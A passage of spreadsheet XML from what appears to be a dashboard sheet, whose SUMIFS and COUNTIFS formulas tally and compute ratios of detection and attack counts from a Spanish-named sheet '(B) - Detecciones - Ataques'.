        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>9</v>
      </c>
      <c r="BT57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>10</v>
      </c>
      <c r="CA57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>3</v>
      </c>
      <c r="CG57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>13</v>
      </c>
      <c r="CL57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>162</v>
      </c>
      <c r="CN57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>8</v>
      </c>
      <c r="CP57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>40</v>
      </c>
      <c r="CQ57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>3</v>
      </c>
      <c r="CR57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>799</v>
      </c>
      <c r="CT57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>4</v>
      </c>
      <c r="CU57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>9</v>
      </c>
      <c r="CY57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>32</v>
      </c>
      <c r="CZ57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>6</v>
      </c>
      <c r="DF57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>474</v>
      </c>
      <c r="DI57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>5505</v>
      </c>
      <c r="DJ57" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>13</v>
      </c>
      <c r="DK57" s="271"/>
      <c r="DO57" s="279"/>
      <c r="DP57" s="271"/>
      <c r="DQ57" s="271"/>
      <c r="DR57" s="271"/>
      <c r="DS57" s="271"/>
      <c r="DT57" s="271"/>
      <c r="DU57" s="271"/>
      <c r="DV57" s="271"/>
      <c r="DW57" s="271"/>
      <c r="DX57" s="271"/>
      <c r="DY57" s="271"/>
      <c r="DZ57" s="271"/>
      <c r="EA57" s="271"/>
      <c r="EB57" s="271"/>
      <c r="EC57" s="271"/>
      <c r="ED57" s="280"/>
      <c r="EG57" s="279"/>
      <c r="EH57" s="271"/>
      <c r="EI57" s="358" t="s">
        <v>209</v>
      </c>
      <c r="EJ57" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S34 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EK57" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S34 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EL57" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S34 &amp; "*")</f>
        <v>12</v>
      </c>
      <c r="EM57" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S34 &amp; "*")</f>
        <v>13</v>
      </c>
      <c r="EN57" s="360">
        <f t="shared" si="37"/>
        <v>13</v>
      </c>
      <c r="EO57" s="364"/>
      <c r="EP57" s="456">
        <f t="shared" si="40"/>
        <v>0.1547619048</v>
      </c>
      <c r="EQ57" s="457">
        <f t="shared" si="41"/>
        <v>0.8452380952</v>
      </c>
      <c r="ER57" s="427">
        <f t="shared" si="42"/>
        <v>0.6571428571</v>
      </c>
      <c r="ES57" s="427">
        <f t="shared" si="43"/>
        <v>0.7727272727</v>
      </c>
      <c r="ET57" s="427">
        <f t="shared" si="48"/>
        <v>1</v>
      </c>
      <c r="EU57" s="271"/>
      <c r="EV57" s="358" t="s">
        <v>1373</v>
      </c>
      <c r="EW57" s="465">
        <f t="shared" ref="EW57:EZ57" si="51">IF(EJ35=0,"-",EJ56/EJ35)</f>
        <v>0.2222222222</v>
      </c>
      <c r="EX57" s="465">
        <f t="shared" si="51"/>
        <v>0.25</v>
      </c>
      <c r="EY57" s="465">
        <f t="shared" si="51"/>
        <v>0.2592592593</v>
      </c>
      <c r="EZ57" s="466">
        <f t="shared" si="51"/>
        <v>0.1011235955</v>
      </c>
      <c r="FA57" s="280"/>
      <c r="FK57" s="445"/>
      <c r="FL57" s="359"/>
      <c r="FM57" s="359"/>
      <c r="FN57" s="359"/>
      <c r="FO57" s="359"/>
      <c r="FP57" s="359"/>
      <c r="FY57" s="379" t="s">
        <v>664</v>
      </c>
      <c r="FZ57" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*"))</f>
        <v>0.0625</v>
      </c>
      <c r="GA57" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*"))</f>
        <v>0.125</v>
      </c>
      <c r="GC57" s="379" t="s">
        <v>664</v>
      </c>
      <c r="GD57" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*"))</f>
        <v>0.1647727273</v>
      </c>
      <c r="GE57" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*"))</f>
        <v>0.25</v>
      </c>
    </row>
    <row r="58">
      <c r="J58" s="277"/>
      <c r="K58" s="349">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BH3:BH139)</f>
        <v>588</v>
      </c>
      <c r="L58" s="350">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!CV3:CV139)</f>
        <v>1196</v>
      </c>
      <c r="M58" s="350">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EL3:EL139)</f>
        <v>1539</v>
      </c>
      <c r="N58" s="473">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GB3:GB139)</f>
        <v>1565</v>
      </c>
      <c r="O58" s="278"/>
      <c r="Q58" s="271"/>
      <c r="R58" s="352" t="s">
        <v>2524</v>
      </c>
      <c r="S58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>3705</v>
      </c>
      <c r="T58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>3177</v>
      </c>
      <c r="U58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>137</v>
      </c>
      <c r="V58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>44</v>
      </c>
      <c r="W58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>14</v>
      </c>
      <c r="X58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>49458</v>
      </c>
      <c r="Y58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>423</v>
      </c>
      <c r="Z58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>164337</v>
      </c>
      <c r="AA58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>415</v>
      </c>
      <c r="AB58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>247</v>
      </c>
      <c r="AC58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>59</v>
      </c>
      <c r="AD58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>815</v>
      </c>
      <c r="AE58" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>47</v>
      </c>
      <c r="AF58" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>6011</v>
      </c>
      <c r="AG58" s="271"/>
      <c r="AH58" s="352" t="s">
        <v>2524</v>
      </c>
      <c r="AI58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>3698</v>
      </c>
      <c r="AJ58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>7</v>
      </c>
      <c r="AL58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>3177</v>
      </c>
      <c r="AN58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>110</v>
      </c>
